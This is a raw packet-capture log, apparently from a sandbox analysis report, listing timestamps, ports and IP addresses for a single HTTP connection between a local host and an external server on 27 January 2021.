Jan 27, 2021 19:29:38.126909018 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126923084 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.126945972 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126983881 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.126996040 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127022028 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127060890 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127090931 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127099991 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127135992 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127149105 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127182007 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127222061 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127228975 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127259970 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127298117 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127315044 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127335072 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127370119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127403975 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127405882 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127444029 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127464056 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127490997 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127532959 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127566099 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127568960 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127608061 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127621889 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127649069 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127684116 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127697945 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127722979 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127759933 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127774954 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127806902 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127846956 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127859116 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127883911 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127921104 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127937078 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.127958059 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.127995014 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128015041 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128034115 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128071070 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128087997 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128118038 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128159046 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128170967 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128195047 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128269911 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128273964 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128312111 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128348112 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128360987 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128387928 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128426075 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128437996 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128463984 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128499985 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128514051 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128537893 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128583908 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128586054 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128626108 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128662109 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128674984 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128700972 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128739119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128751993 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128776073 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128814936 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128853083 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128855944 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128899097 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128901005 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.128941059 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128977060 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.128988981 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129015923 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129054070 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129067898 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129091978 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129129887 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129142046 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129168034 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129215002 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129228115 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129266024 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129319906 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129339933 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129379988 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129436970 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129442930 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129473925 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129489899 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129512072 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129528046 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129548073 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129565001 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129595041 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129601955 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129637003 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129650116 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129674911 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129688978 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129710913 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129728079 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129750013 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129761934 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129785061 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129797935 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129822016 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129834890 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129861116 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129883051 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129909992 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129928112 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129951954 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.129955053 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.129988909 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130012035 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130029917 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130043030 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130068064 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130080938 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130105972 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130142927 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130142927 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130179882 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130184889 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130215883 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130227089 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130233049 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130269051 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130283117 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130305052 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130322933 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130343914 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130359888 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130383015 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130398989 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130419970 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130453110 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130456924 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.130470037 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.130506039 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178323030 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178380013 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178409100 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178448915 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178487062 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178534985 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178576946 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178594112 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178615093 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178632975 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178641081 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178644896 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178647041 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178648949 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178657055 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178659916 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178693056 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178697109 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178718090 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178735971 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178770065 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178775072 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178792953 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178812981 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178845882 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178859949 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178886890 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178916931 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178951979 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.178953886 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.178992033 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179003954 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179030895 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179034948 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179066896 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179069042 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179090977 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179109097 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179141998 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179146051 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179178953 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179193974 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179200888 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179238081 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179274082 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179275036 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179311991 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179312944 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179349899 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179372072 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179375887 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179387093 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179421902 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179425001 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179456949 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179461956 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179497004 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179508924 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179523945 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179553032 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179568052 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179590940 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179608107 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179630041 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179641008 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179667950 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179699898 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179703951 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179740906 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179743052 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179761887 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179780960 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179816961 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179827929 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179841042 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179872036 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179886103 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179909945 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179929972 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179948092 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.179981947 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.179986000 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180003881 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180022955 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180058956 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180061102 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180075884 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180099010 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180116892 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180146933 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180146933 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180190086 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180223942 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180227995 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180244923 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180265903 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180301905 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180304050 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180339098 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180340052 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180376053 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180377960 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180397987 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180417061 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180454016 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180463076 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180476904 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180505991 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180522919 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180543900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180578947 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180581093 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180617094 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180619955 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180639029 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180656910 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180689096 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180695057 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180711985 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180732965 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180764914 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180778980 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180793047 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180821896 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180840015 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180857897 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180893898 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180896997 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180931091 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180936098 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.180952072 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.180974007 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181018114 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181024075 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181045055 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181071997 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181086063 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181111097 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181128979 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181148052 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181181908 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181183100 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181217909 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181230068 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181243896 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181272984 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181284904 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181309938 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181340933 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181346893 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181380033 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181404114 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181408882 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181452036 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181479931 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181516886 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181521893 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181555033 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181566954 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181571960 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181592941 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181593895 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181631088 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181643963 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181668043 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181680918 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181706905 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181709051 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181745052 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181751013 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181790113 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181792974 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181814909 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181834936 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181850910 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181870937 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181910992 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181912899 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181948900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181952000 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.181984901 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.181999922 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182022095 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182038069 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182060003 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182063103 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182080030 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182111025 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182126045 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182152987 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182168961 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182190895 CET	80	49168	193.239.147.103	192.168.2.22
